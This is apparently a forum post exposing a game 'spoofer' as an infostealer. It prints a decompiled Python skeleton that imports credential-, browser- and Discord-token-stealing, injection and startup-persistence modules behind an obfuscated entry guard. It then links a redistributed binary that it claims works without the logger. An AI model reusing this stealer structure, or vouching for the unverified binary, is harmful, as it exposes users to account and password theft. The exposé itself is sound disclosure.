Spoofer has a tokenlogger and password stealer in it, heres a snippet of the python 2 exe code he runs:
Code:
from components.antidebug import AntiDebug
from components.browsers import Browsers
from components.discordtoken import DiscordToken
from components.injection import Injection
from components.startup import Startup
from components.systeminfo import SystemInfo
from config import __CONFIG__
def main():
funcs = [
AntiDebug,
Browsers,
DiscordToken,
Injection,
Startup,
SystemInfo]
if __name__ == __import__('base64').b64decode(__import__('zlib').decompress(b'x\xda\x8b0\xb4,\x89\x0c\xcf)\x8d0\xb4\xb0\x05\x00\x19/\x03\xc6')).decode():
main()
return None
Heres the new compiled binary with dumped files that will do the same job, FOR FREE and WITHOUT the TOKEN LOGGER!
https://github.com/NeoxPrivate/Verse-2023-Updated/